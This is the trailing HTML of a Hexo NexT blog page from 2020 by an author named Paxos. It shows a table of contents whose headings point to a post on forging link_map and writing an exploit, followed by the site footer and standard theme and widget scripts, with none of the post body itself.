class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9B%E5%85%A5dlfixup"><span class="nav-number">3.3.</span> <span class="nav-text">进入_dl_fixup</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BC%AA%E9%80%A0linkmap%E6%94%BB%E5%87%BB"><span class="nav-number">4.</span> <span class="nav-text">伪造link_map攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%A3%80%E6%9F%A5"><span class="nav-number">4.1.</span> <span class="nav-text">绕过检查</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp%E7%BC%96%E5%86%99"><span class="nav-number">5.</span> <span class="nav-text">EXP编写</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E7%BB%AD%E5%A5%87%E6%80%AA%E7%9A%84%E8%B0%83%E8%AF%95%E4%BB%A5%E5%8F%8A64%E4%BD%8D32%E4%BD%8D%E7%9A%84%E4%B8%80%E4%B8%AA%E5%B7%AE%E5%88%AB"><span class="nav-number">6.</span> <span class="nav-text">后续奇怪的调试以及64位32位的一个差别</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Paxos</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next" target="_blank" rel="noopener">
    NexT.Gemini
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  
  <script type="text/javascript">
  wpac_init = window.wpac_init || [];
  wpac_init.push({widget: 'Rating', id: ,
    el: 'wpac-rating',
    color: 'fc6423'
  });
  (function() {
    if ('WIDGETPACK_LOADED' in window) return;
    WIDGETPACK_LOADED = true;
    var mc = document.createElement('script');
    mc.type = 'text/javascript';
    mc.async = true;
    mc.src = '//embed.widgetpack.com/widget.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(mc, s.nextSibling);
  })();
  </script>


  

  

  

</body>
</html>
